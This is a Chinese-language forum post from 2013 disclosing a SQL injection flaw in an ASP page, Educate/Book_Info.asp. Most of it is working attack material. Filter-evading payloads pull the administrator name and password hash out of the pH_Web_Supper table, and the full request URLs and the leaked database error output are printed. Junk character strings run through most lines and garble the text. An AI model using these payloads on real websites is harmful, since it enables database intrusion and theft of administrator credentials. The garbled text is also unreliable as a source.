漏洞出现在Educate/Book_Info.asp
d x. C+ N) L
1 x2 h9 W) @2 }此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出5 r" }+ \/ |, r) W7 H
r$ a' Y" B1 F- ^( v: J8 J1 Texp:如下
$ ~3 S+ k- H, s) w, ]$ L查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
) L# j' _' ~! Z6 w- {, K5 `. q6 ]查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
* I) E, e+ i% K- b. E' ]1 P9 h $ y) A5 b. j& L+ i
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)+ y B) \* D" V; \* R- ~0 ^; j/ F
% v: ^' o3 X6 |+ E" GMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
+ D& l6 E1 l; C# R, ~' s ! _ p+ {* R1 C7 `( l
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。. d' [3 X. t# t
8 m& [* ^! p' E& f3 n2 `% `, y# V
/Educate/Book_Info.asp,行 8; j7 [) B6 ]3 o/ P8 K9 L- U! w
6 c0 j6 C/ A9 M* H, {
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)- {& Q4 E8 R3 ?/ E
1 A3 K, z9 }, f& ^. s- j) BMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
( J' x- R/ l2 ?% L
' j3 ~$ a- ^2 a$ H. v将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
" b& l: W, H" n7 j8 @( r9 T 8 B' ] o, y/ {
/Educate/Book_Info.asp,行 8
- E0 V/ p7 N: I$ U. M/ [ |
发表于 2013-2-16 21:44:16
收藏
支持
反对